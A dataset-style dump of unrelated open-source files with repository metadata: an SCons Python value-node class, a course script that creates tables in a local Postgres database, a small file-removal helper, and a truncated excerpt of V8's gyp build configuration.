# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Node/Python.py 4577 2009/12/27 19:43:56 scons"
import SCons.Node
class ValueNodeInfo(SCons.Node.NodeInfoBase):
current_version_id = 1
field_list = ['csig']
def str_to_node(self, s):
return Value(s)
class ValueBuildInfo(SCons.Node.BuildInfoBase):
current_version_id = 1
class Value(SCons.Node.Node):
"""A class for Python variables, typically passed on the command line
or generated by a script, but not from a file or some other source.
"""
NodeInfo = ValueNodeInfo
BuildInfo = ValueBuildInfo
def __init__(self, value, built_value=None):
SCons.Node.Node.__init__(self)
self.value = value
if built_value is not None:
self.built_value = built_value
def str_for_display(self):
return repr(self.value)
def __str__(self):
return str(self.value)
def make_ready(self):
self.get_csig()
def build(self, **kw):
if not hasattr(self, 'built_value'):
apply (SCons.Node.Node.build, (self,), kw)
is_up_to_date = SCons.Node.Node.children_are_up_to_date
def is_under(self, dir):
# Make Value nodes get built regardless of
# what directory scons was run from. Value nodes
# are outside the filesystem:
return 1
def write(self, built_value):
"""Set the value of the node."""
self.built_value = built_value
def read(self):
"""Return the value. If necessary, the value is built."""
self.build()
if not hasattr(self, 'built_value'):
self.built_value = self.value
return self.built_value
def get_text_contents(self):
"""By the assumption that the node.built_value is a
deterministic product of the sources, the contents of a Value
are the concatenation of all the contents of its sources. As
the value need not be built when get_contents() is called, we
cannot use the actual node.built_value."""
###TODO: something reasonable about universal newlines
contents = str(self.value)
for kid in self.children(None):
contents = contents + kid.get_contents()
return contents
get_contents = get_text_contents ###TODO should return 'bytes' value
def changed_since_last_build(self, target, prev_ni):
cur_csig = self.get_csig()
try:
return cur_csig != prev_ni.csig
except AttributeError:
return 1
def get_csig(self, calc=None):
"""Because we're a Python value node and don't have a real
timestamp, we get to ignore the calculator and just use the
value contents."""
try:
return self.ninfo.csig
except AttributeError:
pass
contents = self.get_contents()
self.get_ninfo().csig = contents
return contents
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
[
"jim@eigenlabs.com"
] |
jim@eigenlabs.com
|
66d03e1c7b8e69e8361800706585b491e9ae2860
|
bb9008c61cb59a4397bb6a54cbc409dc7181a114
|
/.ipynb_checkpoints/create_tables-checkpoint.py
|
158b45bf92a037da5df0f7a0af562ebaf7a5bfc6
|
[] |
no_license
|
anthonywah/Udacity_DE_Nanodegree_Project_Data_Modelling_with_Postgres
|
949ba522f95adc3e03ae8830385407ea2bd6f87f
|
7d73dce91a2eaff456c7639b063e195c33bce48d
|
refs/heads/master
| 2023-03-15T17:02:32.222063
| 2021-03-16T09:03:36
| 2021-03-16T09:03:36
| 348,086,058
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,722
|
py
|
import psycopg2
from sql_queries import create_table_queries, drop_table_queries
def create_database():
"""
- Creates and connects to the sparkifydb
- Returns the connection and cursor to sparkifydb
"""
# connect to default database
conn = psycopg2.connect("host=127.0.0.1 dbname=studentdb user=student password=student")
conn.set_session(autocommit=True)
cur = conn.cursor()
# create sparkify database with UTF8 encoding
cur.execute("DROP DATABASE IF EXISTS sparkifydb")
cur.execute("CREATE DATABASE sparkifydb WITH ENCODING 'utf8' TEMPLATE template0")
# close connection to default database
conn.close()
# connect to sparkify database
conn = psycopg2.connect("host=127.0.0.1 dbname=sparkifydb user=student password=student")
cur = conn.cursor()
return cur, conn
def drop_tables(cur, conn):
"""
Drops each table using the queries in `drop_table_queries` list.
"""
for query in drop_table_queries:
cur.execute(query)
conn.commit()
def create_tables(cur, conn):
"""
Creates each table using the queries in `create_table_queries` list.
"""
for query in create_table_queries:
cur.execute(query)
conn.commit()
def main():
"""
- Drops (if exists) and Creates the sparkify database.
- Establishes connection with the sparkify database and gets
cursor to it.
- Drops all the tables.
- Creates all tables needed.
- Finally, closes the connection.
"""
cur, conn = create_database()
# drop_tables(cur, conn)
create_tables(cur, conn)
conn.close()
if __name__ == "__main__":
main()
|
[
"wahchishing@gmail.com"
] |
wahchishing@gmail.com
|
c48416fa46c02de6c6d36469537af049dc7fba3f
|
6a7dd6dc0ed8009b5ac7f5786272920e612e0954
|
/file_check.py
|
9b26d81211da576f48d5873761cf4f8ab3d1f562
|
[] |
no_license
|
Evan-Wildenhain/AWD
|
addb7512d9292d045430b379967162bbf85a8efc
|
00e4ed8b6613123cb748ec3b0e301251c2010c6c
|
refs/heads/master
| 2022-11-23T07:03:51.357712
| 2020-07-31T19:53:51
| 2020-07-31T19:53:51
| 284,117,900
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 242
|
py
|
import os
def checkIfFileExists(path):
if not os.path.exists(path):
return False
else:
return True
def removeAudio(path,audio,folder_exists):
if not folder_exists:
os.mknod(path)
os.remove(audio)
|
[
"ewildenhain99@gmail.com"
] |
ewildenhain99@gmail.com
|
584f91b56eeb2991b277840b57471dd34e35de4c
|
a9226a15b5254472b51433be3b7892c3e1086a92
|
/src/v8.gyp
|
38c2cf953b74ac0515acc7b37a57b8e99fef7a7b
|
[
"bzip2-1.0.6",
"BSD-3-Clause",
"SunPro"
] |
permissive
|
zhanglaocai/v8
|
0732dd8e25013298ea4ec3780a2a4114de2674c7
|
109033133152990382bcb67a8d92a7335f8c3c2f
|
refs/heads/master
| 2021-01-20T04:22:28.868140
| 2017-04-28T06:44:58
| 2017-04-28T06:47:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 87,274
|
gyp
|
# Copyright 2012 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
{
'variables': {
'v8_code': 1,
'v8_random_seed%': 314159265,
'v8_vector_stores%': 0,
'embed_script%': "",
'warmup_script%': "",
'v8_extra_library_files%': [],
'v8_experimental_extra_library_files%': [],
'mksnapshot_exec': '<(PRODUCT_DIR)/<(EXECUTABLE_PREFIX)mksnapshot<(EXECUTABLE_SUFFIX)',
'v8_os_page_size%': 0,
},
'includes': ['../gypfiles/toolchain.gypi', '../gypfiles/features.gypi', 'inspector/inspector.gypi'],
'targets': [
{
'target_name': 'v8',
'dependencies_traverse': 1,
'dependencies': ['v8_maybe_snapshot'],
'conditions': [
['want_separate_host_toolset==1', {
'toolsets': ['host', 'target'],
}, {
'toolsets': ['target'],
}],
['component=="shared_library"', {
'type': '<(component)',
'sources': [
# Note: on non-Windows we still build this file so that gyp
# has some sources to link into the component.
'v8dll-main.cc',
],
'include_dirs': [
'..',
],
'defines': [
'BUILDING_V8_SHARED',
],
'direct_dependent_settings': {
'defines': [
'USING_V8_SHARED',
],
},
'conditions': [
['OS=="mac"', {
'xcode_settings': {
'OTHER_LDFLAGS': ['-dynamiclib', '-all_load']
},
}],
['soname_version!=""', {
'product_extension': 'so.<(soname_version)',
}],
],
},
{
'type': 'none',
}],
],
'direct_dependent_settings': {
'include_dirs': [
'../include',
],
},
},
{
# This rule delegates to either v8_snapshot, v8_nosnapshot, or
# v8_external_snapshot, depending on the current variables.
# The intention is to make the 'calling' rules a bit simpler.
'target_name': 'v8_maybe_snapshot',
'type': 'none',
'conditions': [
['v8_use_snapshot!="true"', {
# The dependency on v8_base should come from a transitive
# dependency however the Android toolchain requires libv8_base.a
# to appear before libv8_snapshot.a so it's listed explicitly.
'dependencies': ['v8_base', 'v8_nosnapshot'],
}],
['v8_use_snapshot=="true" and v8_use_external_startup_data==0', {
# The dependency on v8_base should come from a transitive
# dependency however the Android toolchain requires libv8_base.a
# to appear before libv8_snapshot.a so it's listed explicitly.
'dependencies': ['v8_base', 'v8_snapshot'],
}],
['v8_use_snapshot=="true" and v8_use_external_startup_data==1 and want_separate_host_toolset==0', {
'dependencies': ['v8_base', 'v8_external_snapshot'],
'inputs': [ '<(PRODUCT_DIR)/snapshot_blob.bin', ],
}],
['v8_use_snapshot=="true" and v8_use_external_startup_data==1 and want_separate_host_toolset==1', {
'dependencies': ['v8_base', 'v8_external_snapshot'],
'target_conditions': [
['_toolset=="host"', {
'inputs': [
'<(PRODUCT_DIR)/snapshot_blob_host.bin',
],
}, {
'inputs': [
'<(PRODUCT_DIR)/snapshot_blob.bin',
],
}],
],
}],
['want_separate_host_toolset==1', {
'toolsets': ['host', 'target'],
}, {
'toolsets': ['target'],
}],
]
},
{
'target_name': 'v8_snapshot',
'type': 'static_library',
'conditions': [
['want_separate_host_toolset==1', {
'toolsets': ['host', 'target'],
'dependencies': [
'mksnapshot#host',
'js2c#host',
],
}, {
'toolsets': ['target'],
'dependencies': [
'mksnapshot',
'js2c',
],
}],
['component=="shared_library"', {
'defines': [
'BUILDING_V8_SHARED',
],
'direct_dependent_settings': {
'defines': [
'USING_V8_SHARED',
],
},
}],
],
'dependencies': [
'v8_base',
],
'include_dirs+': [
'..',
'<(DEPTH)',
],
'sources': [
'<(SHARED_INTERMEDIATE_DIR)/libraries.cc',
'<(SHARED_INTERMEDIATE_DIR)/extras-libraries.cc',
'<(SHARED_INTERMEDIATE_DIR)/experimental-extras-libraries.cc',
'<(INTERMEDIATE_DIR)/snapshot.cc',
],
'actions': [
{
'action_name': 'run_mksnapshot',
'inputs': [
'<(mksnapshot_exec)',
],
'conditions': [
['embed_script!=""', {
'inputs': [
'<(embed_script)',
],
}],
['warmup_script!=""', {
'inputs': [
'<(warmup_script)',
],
}],
],
'outputs': [
'<(INTERMEDIATE_DIR)/snapshot.cc',
],
'variables': {
'mksnapshot_flags': [],
'conditions': [
['v8_random_seed!=0', {
'mksnapshot_flags': ['--random-seed', '<(v8_random_seed)'],
}],
['v8_vector_stores!=0', {
'mksnapshot_flags': ['--vector-stores'],
}],
],
},
'action': [
'<(mksnapshot_exec)',
'<@(mksnapshot_flags)',
'--startup_src', '<@(INTERMEDIATE_DIR)/snapshot.cc',
'<(embed_script)',
'<(warmup_script)',
],
},
],
},
{
'target_name': 'v8_nosnapshot',
'type': 'static_library',
'dependencies': [
'v8_base',
],
'include_dirs+': [
'..',
'<(DEPTH)',
],
'sources': [
'<(SHARED_INTERMEDIATE_DIR)/libraries.cc',
'<(SHARED_INTERMEDIATE_DIR)/extras-libraries.cc',
'<(SHARED_INTERMEDIATE_DIR)/experimental-extras-libraries.cc',
'snapshot/snapshot-empty.cc',
],
'conditions': [
['want_separate_host_toolset==1', {
'toolsets': ['host', 'target'],
'dependencies': ['js2c#host'],
}, {
'toolsets': ['target'],
'dependencies': ['js2c'],
}],
['component=="shared_library"', {
'defines': [
'BUILDING_V8_SHARED',
],
}],
]
},
{
'target_name': 'v8_external_snapshot',
'type': 'static_library',
'conditions': [
[ 'v8_use_external_startup_data==1', {
'conditions': [
['want_separate_host_toolset==1', {
'toolsets': ['host', 'target'],
'dependencies': [
'mksnapshot#host',
'js2c#host',
'natives_blob',
]}, {
'toolsets': ['target'],
'dependencies': [
'mksnapshot',
'js2c',
'natives_blob',
],
}],
['component=="shared_library"', {
'defines': [
'BUILDING_V8_SHARED',
],
'direct_dependent_settings': {
'defines': [
'USING_V8_SHARED',
],
},
}],
],
'dependencies': [
'v8_base',
],
'include_dirs+': [
'..',
'<(DEPTH)',
],
'sources': [
'snapshot/natives-external.cc',
'snapshot/snapshot-external.cc',
],
'actions': [
{
'action_name': 'run_mksnapshot (external)',
'inputs': [
'<(mksnapshot_exec)',
],
'variables': {
'mksnapshot_flags': [],
'conditions': [
['v8_random_seed!=0', {
'mksnapshot_flags': ['--random-seed', '<(v8_random_seed)'],
}],
['v8_vector_stores!=0', {
'mksnapshot_flags': ['--vector-stores'],
}],
['v8_os_page_size!=0', {
'mksnapshot_flags': ['--v8_os_page_size', '<(v8_os_page_size)'],
}],
],
},
'conditions': [
['embed_script!=""', {
'inputs': [
'<(embed_script)',
],
}],
['warmup_script!=""', {
'inputs': [
'<(warmup_script)',
],
}],
['want_separate_host_toolset==1', {
'target_conditions': [
['_toolset=="host"', {
'outputs': [
'<(PRODUCT_DIR)/snapshot_blob_host.bin',
],
'action': [
'<(mksnapshot_exec)',
'<@(mksnapshot_flags)',
'--startup_blob', '<(PRODUCT_DIR)/snapshot_blob_host.bin',
'<(embed_script)',
'<(warmup_script)',
],
}, {
'outputs': [
'<(PRODUCT_DIR)/snapshot_blob.bin',
],
'action': [
'<(mksnapshot_exec)',
'<@(mksnapshot_flags)',
'--startup_blob', '<(PRODUCT_DIR)/snapshot_blob.bin',
'<(embed_script)',
'<(warmup_script)',
],
}],
],
}, {
'outputs': [
'<(PRODUCT_DIR)/snapshot_blob.bin',
],
'action': [
'<(mksnapshot_exec)',
'<@(mksnapshot_flags)',
'--startup_blob', '<(PRODUCT_DIR)/snapshot_blob.bin',
'<(embed_script)',
'<(warmup_script)',
],
}],
],
},
],
}],
],
},
{
'target_name': 'v8_base',
'type': 'static_library',
'dependencies': [
'v8_libbase',
'v8_libsampler',
'inspector/inspector.gyp:protocol_generated_sources#target',
'inspector/inspector.gyp:inspector_injected_script#target',
'inspector/inspector.gyp:inspector_debugger_script#target',
],
'objs': ['foo.o'],
'variables': {
'optimize': 'max',
},
'include_dirs+': [
'..',
'<(DEPTH)',
'<(SHARED_INTERMEDIATE_DIR)'
],
'sources': [ ### gcmole(all) ###
'<@(inspector_all_sources)',
'../include/v8-debug.h',
'../include/v8-platform.h',
'../include/v8-profiler.h',
'../include/v8-testing.h',
'../include/v8-util.h',
'../include/v8-value-serializer-version.h',
'../include/v8-version-string.h',
'../include/v8-version.h',
'../include/v8.h',
'../include/v8config.h',
'accessors.cc',
'accessors.h',
'address-map.cc',
'address-map.h',
'allocation.cc',
'allocation.h',
'allocation-site-scopes.cc',
'allocation-site-scopes.h',
'api.cc',
'api.h',
'api-arguments-inl.h',
'api-arguments.cc',
'api-arguments.h',
'api-natives.cc',
'api-natives.h',
'arguments.cc',
'arguments.h',
'asmjs/asm-js.cc',
'asmjs/asm-js.h',
'asmjs/asm-names.h',
'asmjs/asm-parser.cc',
'asmjs/asm-parser.h',
'asmjs/asm-scanner.cc',
'asmjs/asm-scanner.h',
'asmjs/asm-typer.cc',
'asmjs/asm-typer.h',
'asmjs/asm-types.cc',
'asmjs/asm-types.h',
'asmjs/asm-wasm-builder.cc',
'asmjs/asm-wasm-builder.h',
'asmjs/switch-logic.h',
'asmjs/switch-logic.cc',
'assembler.cc',
'assembler.h',
'assembler-inl.h',
'assert-scope.h',
'assert-scope.cc',
'ast/ast-expression-rewriter.cc',
'ast/ast-expression-rewriter.h',
'ast/ast-function-literal-id-reindexer.cc',
'ast/ast-function-literal-id-reindexer.h',
'ast/ast-numbering.cc',
'ast/ast-numbering.h',
'ast/ast-traversal-visitor.h',
'ast/ast-type-bounds.h',
'ast/ast-types.cc',
'ast/ast-types.h',
'ast/ast-value-factory.cc',
'ast/ast-value-factory.h',
'ast/ast.cc',
'ast/ast.h',
'ast/compile-time-value.cc',
'ast/compile-time-value.h',
'ast/context-slot-cache.cc',
'ast/context-slot-cache.h',
'ast/modules.cc',
'ast/modules.h',
'ast/prettyprinter.cc',
'ast/prettyprinter.h',
'ast/scopes.cc',
'ast/scopes.h',
'ast/variables.cc',
'ast/variables.h',
'background-parsing-task.cc',
'background-parsing-task.h',
'bailout-reason.cc',
'bailout-reason.h',
'basic-block-profiler.cc',
'basic-block-profiler.h',
'bignum-dtoa.cc',
'bignum-dtoa.h',
'bignum.cc',
'bignum.h',
'bit-vector.cc',
'bit-vector.h',
'bootstrapper.cc',
'bootstrapper.h',
'builtins/builtins-api.cc',
'builtins/builtins-arguments-gen.cc',
'builtins/builtins-arguments-gen.h',
'builtins/builtins-arraybuffer.cc',
'builtins/builtins-array.cc',
'builtins/builtins-array-gen.cc',
'builtins/builtins-async-function-gen.cc',
'builtins/builtins-async-generator-gen.cc',
'builtins/builtins-async-iterator-gen.cc',
'builtins/builtins-async-gen.cc',
'builtins/builtins-async-gen.h',
'builtins/builtins-boolean.cc',
'builtins/builtins-boolean-gen.cc',
'builtins/builtins-call.cc',
'builtins/builtins-call-gen.cc',
'builtins/builtins-callsite.cc',
'builtins/builtins-console.cc',
'builtins/builtins-console-gen.cc',
'builtins/builtins-constructor-gen.cc',
'builtins/builtins-constructor-gen.h',
'builtins/builtins-constructor.h',
'builtins/builtins-conversion-gen.cc',
'builtins/builtins-dataview.cc',
'builtins/builtins-date.cc',
'builtins/builtins-date-gen.cc',
'builtins/builtins-debug.cc',
'builtins/builtins-definitions.h',
'builtins/builtins-descriptors.h',
'builtins/builtins-error.cc',
'builtins/builtins-forin-gen.cc',
'builtins/builtins-forin-gen.h',
'builtins/builtins-function.cc',
'builtins/builtins-function-gen.cc',
'builtins/builtins-generator-gen.cc',
'builtins/builtins-global.cc',
'builtins/builtins-global-gen.cc',
'builtins/builtins-handler-gen.cc',
'builtins/builtins-ic-gen.cc',
'builtins/builtins-internal.cc',
'builtins/builtins-internal-gen.cc',
'builtins/builtins-interpreter.cc',
'builtins/builtins-interpreter-gen.cc',
'builtins/builtins-json.cc',
'builtins/builtins-math.cc',
'builtins/builtins-math-gen.cc',
'builtins/builtins-number.cc',
'builtins/builtins-number-gen.cc',
'builtins/builtins-object.cc',
'builtins/builtins-object-gen.cc',
'builtins/builtins-promise-gen.cc',
'builtins/builtins-promise-gen.h',
'builtins/builtins-proxy.cc',
'builtins/builtins-reflect.cc',
'builtins/builtins-regexp.cc',
'builtins/builtins-regexp-gen.cc',
'builtins/builtins-regexp-gen.h',
'builtins/builtins-sharedarraybuffer.cc',
'builtins/builtins-sharedarraybuffer-gen.cc',
'builtins/builtins-string.cc',
'builtins/builtins-string-gen.cc',
'builtins/builtins-intl.cc',
'builtins/builtins-symbol.cc',
'builtins/builtins-symbol-gen.cc',
'builtins/builtins-typedarray.cc',
'builtins/builtins-typedarray-gen.cc',
'builtins/builtins-utils.h',
'builtins/builtins-utils-gen.h',
'builtins/builtins-wasm-gen.cc',
'builtins/builtins.cc',
'builtins/builtins.h',
'builtins/setup-builtins-internal.cc',
'cached-powers.cc',
'cached-powers.h',
'callable.h',
'cancelable-task.cc',
'cancelable-task.h',
'char-predicates.cc',
'char-predicates-inl.h',
'char-predicates.h',
'checks.h',
'code-events.h',
'code-factory.cc',
'code-factory.h',
'code-stub-assembler.cc',
'code-stub-assembler.h',
'code-stubs.cc',
'code-stubs.h',
'code-stubs-hydrogen.cc',
'code-stubs-utils.h',
'codegen.cc',
'codegen.h',
'collector.h',
'compilation-cache.cc',
'compilation-cache.h',
'compilation-dependencies.cc',
'compilation-dependencies.h',
'compilation-info.cc',
'compilation-info.h',
'compilation-statistics.cc',
'compilation-statistics.h',
'compiler/access-builder.cc',
'compiler/access-builder.h',
'compiler/access-info.cc',
'compiler/access-info.h',
'compiler/all-nodes.cc',
'compiler/all-nodes.h',
'compiler/ast-graph-builder.cc',
'compiler/ast-graph-builder.h',
'compiler/ast-loop-assignment-analyzer.cc',
'compiler/ast-loop-assignment-analyzer.h',
'compiler/basic-block-instrumentor.cc',
'compiler/basic-block-instrumentor.h',
'compiler/branch-elimination.cc',
'compiler/branch-elimination.h',
'compiler/bytecode-analysis.cc',
'compiler/bytecode-analysis.h',
'compiler/bytecode-graph-builder.cc',
'compiler/bytecode-graph-builder.h',
'compiler/bytecode-liveness-map.cc',
'compiler/bytecode-liveness-map.h',
'compiler/c-linkage.cc',
'compiler/checkpoint-elimination.cc',
'compiler/checkpoint-elimination.h',
'compiler/code-generator-impl.h',
'compiler/code-generator.cc',
'compiler/code-generator.h',
'compiler/code-assembler.cc',
'compiler/code-assembler.h',
'compiler/common-node-cache.cc',
'compiler/common-node-cache.h',
'compiler/common-operator-reducer.cc',
'compiler/common-operator-reducer.h',
'compiler/common-operator.cc',
'compiler/common-operator.h',
'compiler/control-builders.cc',
'compiler/control-builders.h',
'compiler/control-equivalence.cc',
'compiler/control-equivalence.h',
'compiler/control-flow-optimizer.cc',
'compiler/control-flow-optimizer.h',
'compiler/dead-code-elimination.cc',
'compiler/dead-code-elimination.h',
'compiler/diamond.h',
'compiler/effect-control-linearizer.cc',
'compiler/effect-control-linearizer.h',
'compiler/escape-analysis.cc',
'compiler/escape-analysis.h',
'compiler/escape-analysis-reducer.cc',
'compiler/escape-analysis-reducer.h',
'compiler/frame.cc',
'compiler/frame.h',
'compiler/frame-elider.cc',
'compiler/frame-elider.h',
'compiler/frame-states.cc',
'compiler/frame-states.h',
'compiler/gap-resolver.cc',
'compiler/gap-resolver.h',
'compiler/graph-assembler.cc',
'compiler/graph-assembler.h',
'compiler/graph-reducer.cc',
'compiler/graph-reducer.h',
'compiler/graph-trimmer.cc',
'compiler/graph-trimmer.h',
'compiler/graph-visualizer.cc',
'compiler/graph-visualizer.h',
'compiler/graph.cc',
'compiler/graph.h',
'compiler/instruction-codes.h',
'compiler/instruction-selector-impl.h',
'compiler/instruction-selector.cc',
'compiler/instruction-selector.h',
'compiler/instruction-scheduler.cc',
'compiler/instruction-scheduler.h',
'compiler/instruction.cc',
'compiler/instruction.h',
'compiler/int64-lowering.cc',
'compiler/int64-lowering.h',
'compiler/js-builtin-reducer.cc',
'compiler/js-builtin-reducer.h',
'compiler/js-call-reducer.cc',
'compiler/js-call-reducer.h',
'compiler/js-context-specialization.cc',
'compiler/js-context-specialization.h',
'compiler/js-create-lowering.cc',
'compiler/js-create-lowering.h',
'compiler/js-frame-specialization.cc',
'compiler/js-frame-specialization.h',
'compiler/js-generic-lowering.cc',
'compiler/js-generic-lowering.h',
'compiler/js-graph.cc',
'compiler/js-graph.h',
'compiler/js-inlining.cc',
'compiler/js-inlining.h',
'compiler/js-inlining-heuristic.cc',
'compiler/js-inlining-heuristic.h',
'compiler/js-intrinsic-lowering.cc',
'compiler/js-intrinsic-lowering.h',
'compiler/js-native-context-specialization.cc',
'compiler/js-native-context-specialization.h',
'compiler/js-operator.cc',
'compiler/js-operator.h',
'compiler/js-type-hint-lowering.cc',
'compiler/js-type-hint-lowering.h',
'compiler/js-typed-lowering.cc',
'compiler/js-typed-lowering.h',
'compiler/jump-threading.cc',
'compiler/jump-threading.h',
'compiler/linkage.cc',
'compiler/linkage.h',
'compiler/liveness-analyzer.cc',
'compiler/liveness-analyzer.h',
'compiler/live-range-separator.cc',
'compiler/live-range-separator.h',
'compiler/load-elimination.cc',
'compiler/load-elimination.h',
'compiler/loop-analysis.cc',
'compiler/loop-analysis.h',
'compiler/loop-peeling.cc',
'compiler/loop-peeling.h',
'compiler/loop-variable-optimizer.cc',
'compiler/loop-variable-optimizer.h',
'compiler/machine-operator-reducer.cc',
'compiler/machine-operator-reducer.h',
'compiler/machine-operator.cc',
'compiler/machine-operator.h',
'compiler/machine-graph-verifier.cc',
'compiler/machine-graph-verifier.h',
'compiler/memory-optimizer.cc',
'compiler/memory-optimizer.h',
'compiler/move-optimizer.cc',
'compiler/move-optimizer.h',
'compiler/node-aux-data.h',
'compiler/node-cache.cc',
'compiler/node-cache.h',
'compiler/node-marker.cc',
'compiler/node-marker.h',
'compiler/node-matchers.cc',
'compiler/node-matchers.h',
'compiler/node-properties.cc',
'compiler/node-properties.h',
'compiler/node.cc',
'compiler/node.h',
'compiler/opcodes.cc',
'compiler/opcodes.h',
'compiler/operation-typer.cc',
'compiler/operation-typer.h',
'compiler/operator-properties.cc',
'compiler/operator-properties.h',
'compiler/operator.cc',
'compiler/operator.h',
'compiler/osr.cc',
'compiler/osr.h',
'compiler/pipeline.cc',
'compiler/pipeline.h',
'compiler/pipeline-statistics.cc',
'compiler/pipeline-statistics.h',
'compiler/raw-machine-assembler.cc',
'compiler/raw-machine-assembler.h',
'compiler/redundancy-elimination.cc',
'compiler/redundancy-elimination.h',
'compiler/register-allocator.cc',
'compiler/register-allocator.h',
'compiler/register-allocator-verifier.cc',
'compiler/register-allocator-verifier.h',
'compiler/representation-change.cc',
'compiler/representation-change.h',
'compiler/schedule.cc',
'compiler/schedule.h',
'compiler/scheduler.cc',
'compiler/scheduler.h',
'compiler/select-lowering.cc',
'compiler/select-lowering.h',
'compiler/simd-scalar-lowering.cc',
'compiler/simd-scalar-lowering.h',
'compiler/simplified-lowering.cc',
'compiler/simplified-lowering.h',
'compiler/simplified-operator-reducer.cc',
'compiler/simplified-operator-reducer.h',
'compiler/simplified-operator.cc',
'compiler/simplified-operator.h',
'compiler/compiler-source-position-table.cc',
'compiler/compiler-source-position-table.h',
'compiler/state-values-utils.cc',
'compiler/state-values-utils.h',
'compiler/store-store-elimination.cc',
'compiler/store-store-elimination.h',
'compiler/tail-call-optimization.cc',
'compiler/tail-call-optimization.h',
'compiler/types.cc',
'compiler/types.h',
'compiler/type-cache.cc',
'compiler/type-cache.h',
'compiler/typed-optimization.cc',
'compiler/typed-optimization.h',
'compiler/typer.cc',
'compiler/typer.h',
'compiler/unwinding-info-writer.h',
'compiler/value-numbering-reducer.cc',
'compiler/value-numbering-reducer.h',
'compiler/verifier.cc',
'compiler/verifier.h',
'compiler/wasm-compiler.cc',
'compiler/wasm-compiler.h',
'compiler/wasm-linkage.cc',
'compiler/zone-stats.cc',
'compiler/zone-stats.h',
'compiler-dispatcher/compiler-dispatcher.cc',
'compiler-dispatcher/compiler-dispatcher.h',
'compiler-dispatcher/compiler-dispatcher-job.cc',
'compiler-dispatcher/compiler-dispatcher-job.h',
'compiler-dispatcher/compiler-dispatcher-tracer.cc',
'compiler-dispatcher/compiler-dispatcher-tracer.h',
'compiler-dispatcher/optimizing-compile-dispatcher.cc',
'compiler-dispatcher/optimizing-compile-dispatcher.h',
'compiler.cc',
'compiler.h',
'contexts-inl.h',
'contexts.cc',
'contexts.h',
'conversions-inl.h',
'conversions.cc',
'conversions.h',
'counters-inl.h',
'counters.cc',
'counters.h',
'crankshaft/compilation-phase.cc',
'crankshaft/compilation-phase.h',
'crankshaft/hydrogen-alias-analysis.h',
'crankshaft/hydrogen-bce.cc',
'crankshaft/hydrogen-bce.h',
'crankshaft/hydrogen-canonicalize.cc',
'crankshaft/hydrogen-canonicalize.h',
'crankshaft/hydrogen-check-elimination.cc',
'crankshaft/hydrogen-check-elimination.h',
'crankshaft/hydrogen-dce.cc',
'crankshaft/hydrogen-dce.h',
'crankshaft/hydrogen-dehoist.cc',
'crankshaft/hydrogen-dehoist.h',
'crankshaft/hydrogen-environment-liveness.cc',
'crankshaft/hydrogen-environment-liveness.h',
'crankshaft/hydrogen-escape-analysis.cc',
'crankshaft/hydrogen-escape-analysis.h',
'crankshaft/hydrogen-flow-engine.h',
'crankshaft/hydrogen-gvn.cc',
'crankshaft/hydrogen-gvn.h',
'crankshaft/hydrogen-infer-representation.cc',
'crankshaft/hydrogen-infer-representation.h',
'crankshaft/hydrogen-infer-types.cc',
'crankshaft/hydrogen-infer-types.h',
'crankshaft/hydrogen-instructions.cc',
'crankshaft/hydrogen-instructions.h',
'crankshaft/hydrogen-load-elimination.cc',
'crankshaft/hydrogen-load-elimination.h',
'crankshaft/hydrogen-mark-unreachable.cc',
'crankshaft/hydrogen-mark-unreachable.h',
'crankshaft/hydrogen-osr.cc',
'crankshaft/hydrogen-osr.h',
'crankshaft/hydrogen-range-analysis.cc',
'crankshaft/hydrogen-range-analysis.h',
'crankshaft/hydrogen-redundant-phi.cc',
'crankshaft/hydrogen-redundant-phi.h',
'crankshaft/hydrogen-removable-simulates.cc',
'crankshaft/hydrogen-removable-simulates.h',
'crankshaft/hydrogen-representation-changes.cc',
'crankshaft/hydrogen-representation-changes.h',
'crankshaft/hydrogen-sce.cc',
'crankshaft/hydrogen-sce.h',
'crankshaft/hydrogen-store-elimination.cc',
'crankshaft/hydrogen-store-elimination.h',
'crankshaft/hydrogen-types.cc',
'crankshaft/hydrogen-types.h',
